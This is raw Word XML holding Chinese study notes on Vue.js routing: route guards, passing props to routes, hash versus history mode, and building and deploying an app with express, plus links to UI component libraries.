页面标题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||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'硅谷系统'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</w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>独享路由守卫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486535" cy="2310765"/>
            <wp:effectExtent l="0" t="0" r="6985" b="5715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·使用方法和全局守卫一样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'../pages/Detail'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EC9B0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'guanyu'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'关于'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'zhuye'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'主页'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'xinwen'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'新闻'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//独享路由守卫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beforeEnter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'独享路由守卫'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//判断是否需要鉴权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)===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'学校名不对，无权限查看！'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'xiaoxi'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'详情'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//props的第一种写法，值为对象，该对象中的所有key-value都会以props的形式传给Detail组件。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props:{a:1,b:'hello'}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//props的第二种写法，值为布尔值，若布尔值为真，就会把该路由组件收到的所有params参数，以props的形式传给Detail组件。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//props的第三种写法，值为函数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props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//全局前置路由守卫————初始化的时候被调用、每次路由切换之前被调用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router.beforeEach((to,from,next)=&gt;{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console.log('前置路由守卫',to,from)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if(to.meta.isAuth){ //判断是否需要鉴权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if(localStorage.getItem('school')==='atguigu'){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next()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}else{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alert('学校名不对，无权限查看！')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}else{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next()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})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//全局后置路由守卫————初始化的时候被调用、每次路由切换之后被调用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afterEach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'后置路由守卫'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||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'硅谷系统'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</w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>组件内路由守卫</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·要修改的文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="1215390" cy="2255520"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="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·index.js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该文件专门用于创建整个应用的路由器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'vue-router'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//引入组件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'../pages/About'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'../pages/Home'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'../pages/News'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'../pages/Message'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import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'../pages/Detail'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//创建并暴露一个路由器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const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 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new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VueRouter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routes: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'guanyu'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component:About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'关于'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'zhuye'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'/home'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component:Home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'主页'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'xinwen'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'news'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component:News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'新闻'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beforeEnter: (to, from, next) =&gt;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console.log('前置路由守卫',to,from)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if(to.meta.isAuth){ //判断是否需要鉴权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if(localStorage.getItem('school')==='atguigu'){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    next()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}else{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    alert('学校名不对，无权限查看！')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}else{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    next()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        }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'xiaoxi'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'message'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component:Message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'消息'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children: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[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'xiangqing'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path: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'detail'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component:Detail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meta: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isAuth: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true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'详情'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//props的第一种写法，值为对象，该对象中的所有key-value都会以props的形式传给Detail组件。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props:{a:1,b:'hello'}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//props的第二种写法，值为布尔值，若布尔值为真，就会把该路由组件收到的所有params参数，以props的形式传给Detail组件。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props:true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//props的第三种写法，值为函数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props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return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title:$route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query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a:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="B5CEA8"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>1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b: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'hello'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]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//全局前置路由守卫————初始化的时候被调用、每次路由切换之前被调用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router.beforeEach((to,from,next)=&gt;{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console.log('前置路由守卫',to,from)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if(to.meta.isAuth){ //判断是否需要鉴权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if(localStorage.getItem('school')==='atguigu'){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next()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}else{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alert('学校名不对，无权限查看！')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}else{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next()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})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//全局后置路由守卫————初始化的时候被调用、每次路由切换之后被调用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afterEach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=&gt;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'后置路由守卫'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document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=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title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|| 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'硅谷系统'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})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4FC1FF"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>router</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·About.vue</w:t>
      </w:r>
    </w:p>
    <w:p/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我是About的内容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h2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template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export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default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name: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'About'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beforeDestroy()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console.log('About组件即将被销毁了')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/* mounted()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console.log('About组件挂载完毕了',this)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window.aboutRoute = this.$route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    window.aboutRouter = this.$router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        },  */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mounted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 console.log('%%%',this.$route)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//通过路由规则，进入该组件之前被调用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beforeRouteEnter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'About--beforeRouteEnter'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meta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isAuth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//判断是否需要鉴权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if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localStorage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getItem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'school'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)===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'atguigu'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alert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'学校名不对，无权限查看！'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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>else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},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//通过路由规则，离开该组件之前被调用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beforeRouteLeave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(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 {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console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.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log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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>'About--beforeRouteLeave'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to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,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>from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6A9955"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>//方向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    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>next</w:t>
      </w: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()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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>    }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:line="228" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="D4D4D4"/>
        </w:rPr>
      </w:pP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&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>history模式与hash模式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·路由器的两种工作模式，默认开启的是hash模式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>对于一个url来说，什么是hash值？—— #及其后面的内容就是hash值。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>hash值不会包含在 HTTP 请求中，即：hash值不会带给服务器。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>hash模式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>地址中永远带着#号，不美观</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>若以后将地址通过第三方手机app分享，若app校验严格，则地址会被标记为不合法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>兼容性较好</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>history模式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">地址干净，美观 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>兼容性和hash模式相比略差</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>应用部署上线时需要后端人员支持，解决刷新页面服务端404的问题</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目打包与部署</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·npm run build</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3177540" cy="1645920"/>
            <wp:effectExtent l="0" t="0" r="762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·生成该文件夹</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="3860165"/>
            <wp:effectExtent l="0" t="0" r="1270" b="1079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46225"/>
            <wp:effectExtent l="0" t="0" r="635" b="8255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·部署</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·现场搭建微型服务器</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·新建文件夹并用vscode打开</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·npm init命令</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·package name为atguigu_sever</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·其他的直接敲回车</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>npm i express</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·如图配置即可</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="3354070"/>
            <wp:effectExtent l="0" t="0" r="1905" b="13970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·解决刷新页面服务端404的问题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 使用connect-history-api-fallback</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 地址</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-- </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.npmjs.com/package/connect-history-api-fallback" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://www.npmjs.com/package/connect-history-api-fallback</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 安装</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-- npm install --save connect-history-api-fallback</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 如图配置即可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3380105"/>
            <wp:effectExtent l="0" t="0" r="14605" b="3175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Vue UI 组件库</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>移动端常用UI 组件库</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">·Vant 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"https://youzan.github.io/vant" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://youzan.github.io/vant</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">·Cube UI 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"https://didi.github.io/cube-ui" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://didi.github.io/cube-ui</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">·Mint UI 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"http://mint-ui.github.io" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://mint-ui.github.io</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>PC 端常用UI 组件库</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">·Element UI 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"https://element.eleme.cn" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://element.eleme.cn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">·IView UI </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.iviewui.com" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://www.iviewui.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·需要使用的时候去看官网文档就好，不要死记硬背记笔记</w:t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4133FB"/>
    <w:rsid w:val="00046765"/>
    <w:rsid w:val="000B45CF"/>
    <w:rsid w:val="000E50A8"/>
    <w:rsid w:val="0011666B"/>
    <w:rsid w:val="001C2741"/>
    <w:rsid w:val="00270F48"/>
    <w:rsid w:val="002B5604"/>
    <w:rsid w:val="002D5FED"/>
    <w:rsid w:val="003035D8"/>
    <w:rsid w:val="003140F5"/>
    <w:rsid w:val="00381011"/>
    <w:rsid w:val="00402152"/>
    <w:rsid w:val="00426DD0"/>
    <w:rsid w:val="00497670"/>
    <w:rsid w:val="004C2FA1"/>
    <w:rsid w:val="00544ADE"/>
    <w:rsid w:val="005527C2"/>
    <w:rsid w:val="00580106"/>
    <w:rsid w:val="005B5E4C"/>
    <w:rsid w:val="005E11E0"/>
    <w:rsid w:val="0064482C"/>
    <w:rsid w:val="007010F3"/>
    <w:rsid w:val="007E2C0D"/>
    <w:rsid w:val="008A7025"/>
    <w:rsid w:val="00913A9E"/>
    <w:rsid w:val="00A26450"/>
    <w:rsid w:val="00A3201F"/>
    <w:rsid w:val="00A91411"/>
    <w:rsid w:val="00B47E67"/>
    <w:rsid w:val="00BA34C2"/>
    <w:rsid w:val="00C05EE6"/>
    <w:rsid w:val="00C532D6"/>
    <w:rsid w:val="00D2609A"/>
    <w:rsid w:val="00D55F0F"/>
    <w:rsid w:val="00DD72A1"/>
    <w:rsid w:val="00E25B05"/>
    <w:rsid w:val="00E3707A"/>
    <w:rsid w:val="00E91754"/>
    <w:rsid w:val="00EB0DB7"/>
    <w:rsid w:val="00EB1B09"/>
    <w:rsid w:val="00EC03BA"/>
    <w:rsid w:val="00F503E8"/>
    <w:rsid w:val="00FA4B8C"/>
    <w:rsid w:val="010B3EAA"/>
    <w:rsid w:val="0129742A"/>
    <w:rsid w:val="01321132"/>
    <w:rsid w:val="013A6923"/>
    <w:rsid w:val="013B751C"/>
    <w:rsid w:val="01523EF4"/>
    <w:rsid w:val="01AF725D"/>
    <w:rsid w:val="01D70730"/>
    <w:rsid w:val="01DE73DD"/>
    <w:rsid w:val="01EE7E9A"/>
    <w:rsid w:val="01FF4599"/>
    <w:rsid w:val="02090AD8"/>
    <w:rsid w:val="02095706"/>
    <w:rsid w:val="023E3B9B"/>
    <w:rsid w:val="02511D9A"/>
    <w:rsid w:val="027E1EAA"/>
    <w:rsid w:val="027E3EA7"/>
    <w:rsid w:val="0289467E"/>
    <w:rsid w:val="028F4428"/>
    <w:rsid w:val="02944AEF"/>
    <w:rsid w:val="02AA1968"/>
    <w:rsid w:val="02FB527A"/>
    <w:rsid w:val="030E140F"/>
    <w:rsid w:val="0333726F"/>
    <w:rsid w:val="035B5053"/>
    <w:rsid w:val="036F0BEC"/>
    <w:rsid w:val="038A5411"/>
    <w:rsid w:val="03907AFA"/>
    <w:rsid w:val="03916574"/>
    <w:rsid w:val="0396507A"/>
    <w:rsid w:val="03B376D2"/>
    <w:rsid w:val="03D26437"/>
    <w:rsid w:val="03ED7B38"/>
    <w:rsid w:val="03FC4BAF"/>
    <w:rsid w:val="04076774"/>
    <w:rsid w:val="0441184B"/>
    <w:rsid w:val="046026A5"/>
    <w:rsid w:val="0474089F"/>
    <w:rsid w:val="04A42F2B"/>
    <w:rsid w:val="04AC16B3"/>
    <w:rsid w:val="04E04A4F"/>
    <w:rsid w:val="04E118D4"/>
    <w:rsid w:val="04E23388"/>
    <w:rsid w:val="04FE250B"/>
    <w:rsid w:val="05141A17"/>
    <w:rsid w:val="05613B05"/>
    <w:rsid w:val="05783F0F"/>
    <w:rsid w:val="059C48F5"/>
    <w:rsid w:val="05B40BFE"/>
    <w:rsid w:val="05DE7E6E"/>
    <w:rsid w:val="05F816DE"/>
    <w:rsid w:val="06407F07"/>
    <w:rsid w:val="064B190C"/>
    <w:rsid w:val="065D0C5D"/>
    <w:rsid w:val="06854D3A"/>
    <w:rsid w:val="069A6BC4"/>
    <w:rsid w:val="06A9401A"/>
    <w:rsid w:val="06B005B8"/>
    <w:rsid w:val="06B61D0F"/>
    <w:rsid w:val="06C05263"/>
    <w:rsid w:val="06C3495C"/>
    <w:rsid w:val="06C60F0D"/>
    <w:rsid w:val="06DD2889"/>
    <w:rsid w:val="07035108"/>
    <w:rsid w:val="071C2D24"/>
    <w:rsid w:val="072B6CD1"/>
    <w:rsid w:val="07457257"/>
    <w:rsid w:val="07680E84"/>
    <w:rsid w:val="07836020"/>
    <w:rsid w:val="07892892"/>
    <w:rsid w:val="078F4B10"/>
    <w:rsid w:val="07B026EB"/>
    <w:rsid w:val="07B972F3"/>
    <w:rsid w:val="07E45794"/>
    <w:rsid w:val="080D22A8"/>
    <w:rsid w:val="082951B0"/>
    <w:rsid w:val="08A97496"/>
    <w:rsid w:val="08F11DFE"/>
    <w:rsid w:val="091673F9"/>
    <w:rsid w:val="09275954"/>
    <w:rsid w:val="09365414"/>
    <w:rsid w:val="094523B1"/>
    <w:rsid w:val="096B7B17"/>
    <w:rsid w:val="097C6B40"/>
    <w:rsid w:val="09BF2EB2"/>
    <w:rsid w:val="09C354F8"/>
    <w:rsid w:val="09D0557A"/>
    <w:rsid w:val="0A1401E9"/>
    <w:rsid w:val="0A746612"/>
    <w:rsid w:val="0A9256FD"/>
    <w:rsid w:val="0AC75E57"/>
    <w:rsid w:val="0AD84DD2"/>
    <w:rsid w:val="0ADB1F85"/>
    <w:rsid w:val="0AE023B4"/>
    <w:rsid w:val="0AFE1C1D"/>
    <w:rsid w:val="0B153867"/>
    <w:rsid w:val="0B2F6284"/>
    <w:rsid w:val="0B355625"/>
    <w:rsid w:val="0B3B1605"/>
    <w:rsid w:val="0B672BCA"/>
    <w:rsid w:val="0B7C767F"/>
    <w:rsid w:val="0B8A3DF6"/>
    <w:rsid w:val="0B991283"/>
    <w:rsid w:val="0BBD143C"/>
    <w:rsid w:val="0BC73723"/>
    <w:rsid w:val="0BDB0EEE"/>
    <w:rsid w:val="0C2A460D"/>
    <w:rsid w:val="0C6A3234"/>
    <w:rsid w:val="0C905092"/>
    <w:rsid w:val="0CA54136"/>
    <w:rsid w:val="0D0615A2"/>
    <w:rsid w:val="0D112552"/>
    <w:rsid w:val="0D316565"/>
    <w:rsid w:val="0D3178F0"/>
    <w:rsid w:val="0D48787D"/>
    <w:rsid w:val="0D66595E"/>
    <w:rsid w:val="0D811365"/>
    <w:rsid w:val="0D9268B0"/>
    <w:rsid w:val="0DC04744"/>
    <w:rsid w:val="0DCE3C5F"/>
    <w:rsid w:val="0DCE4813"/>
    <w:rsid w:val="0DD5283F"/>
    <w:rsid w:val="0DE132E0"/>
    <w:rsid w:val="0DF73DDB"/>
    <w:rsid w:val="0E0B3880"/>
    <w:rsid w:val="0E114C3D"/>
    <w:rsid w:val="0E207CCB"/>
    <w:rsid w:val="0E2B5E93"/>
    <w:rsid w:val="0E322E59"/>
    <w:rsid w:val="0E352A63"/>
    <w:rsid w:val="0E8A1619"/>
    <w:rsid w:val="0EB67D2D"/>
    <w:rsid w:val="0EBC46A8"/>
    <w:rsid w:val="0EC53123"/>
    <w:rsid w:val="0F2D2269"/>
    <w:rsid w:val="0F3C4061"/>
    <w:rsid w:val="0F5258CA"/>
    <w:rsid w:val="0F65140E"/>
    <w:rsid w:val="0F6F279D"/>
    <w:rsid w:val="0F955228"/>
    <w:rsid w:val="0FA26C5E"/>
    <w:rsid w:val="0FAA1428"/>
    <w:rsid w:val="0FAF708B"/>
    <w:rsid w:val="0FBB2C24"/>
    <w:rsid w:val="0FC732B1"/>
    <w:rsid w:val="0FE33F85"/>
    <w:rsid w:val="0FF262DC"/>
    <w:rsid w:val="0FF950EF"/>
    <w:rsid w:val="0FFB4EDF"/>
    <w:rsid w:val="100924F0"/>
    <w:rsid w:val="100D2D96"/>
    <w:rsid w:val="100F175F"/>
    <w:rsid w:val="101513FF"/>
    <w:rsid w:val="101656CD"/>
    <w:rsid w:val="10205AAB"/>
    <w:rsid w:val="104849F2"/>
    <w:rsid w:val="10525FAA"/>
    <w:rsid w:val="107175F6"/>
    <w:rsid w:val="10A80A54"/>
    <w:rsid w:val="10E63F9C"/>
    <w:rsid w:val="10EB73BE"/>
    <w:rsid w:val="10ED7E1F"/>
    <w:rsid w:val="10F824A3"/>
    <w:rsid w:val="11187C65"/>
    <w:rsid w:val="11454531"/>
    <w:rsid w:val="114A189B"/>
    <w:rsid w:val="11974D88"/>
    <w:rsid w:val="11A479A4"/>
